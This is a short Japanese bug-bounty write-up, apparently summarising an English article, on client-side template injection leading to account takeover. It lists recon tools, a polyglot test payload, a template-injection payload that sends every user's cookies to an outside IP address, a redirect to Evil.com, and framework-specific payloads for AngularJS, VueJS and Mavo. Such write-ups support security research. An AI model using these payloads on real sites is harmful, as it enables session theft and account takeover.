Hello there, ('ω')ノ
C.S.T.Iがアカウントの乗っ取りにつながるを。
脆弱性:
CSTI
アカウントの乗っ取り
記事:
https://systemweakness.com/c-s-t-i-lead-to-account-takeover-f21ea07d9141
はじめに偵察するために131のドメインを持っていたので。
サブドメイン列挙に対してクイックコマンドを実行することに。
subfinder 、findomain、amass、assetfinderを使用してサブドメインを検索して。
deduplicatedを使用して重複を削除し、httpxを2回使用して。
https://github.com/Findomain/Findomain
https://github.com/nytr0gen/deduplicate
まず、2xxステータスコードを見つけるために。
httpxを実行して有効なサブドメインを検索して。
2xx.txtリストからスクリーンショットを撮って。
下記は、インジェクトで多くの脆弱性をテストすることにつながる。
魔法のペイロードで。
`“‘><img src=x onerror=promtp(7)>`”’${{8*8}}
このペイロードは単純ですが。
HTMLインジェクション、XSS、C.S.T.I、S.S.T.Iをテストするのに役立って。
このサブドメインでは、会社のようなアカウントを作成して。
他のユーザを招待できて。
管理者は他のユーザを会社に招待できて。
一方、エンドポイントでは、通常のユーザと管理者がページを作成でき。
このページには多くの入力があり、写真などをアップロードできて。
ページの一部で魔法のペイロードを入力すると64を返したので脆弱であると判断し。
下記のペイロードを使用すると。
すべてのユーザのCookieを盗み、完全なアカウントを乗っ取ることができて。
{{constructor.constructor('new Image().src="http://192.168.149.128/bogus.php?output="+document.cookie;')()}}
下記を使用するとページをリダイレクトできて。
{{constructor.constructor('location.replace("https://Evil.com")')()}}
下記は、さまざまなJavaScriptライブラリのペイロードで。
AngularJS:
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
VueJS:
V3:
{{_openBlock.constructor('alert(1)')()}}
V2:
{{constructor.constructor('alert(1)')()}}
Mavo:
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
Best regards, (^^ゞ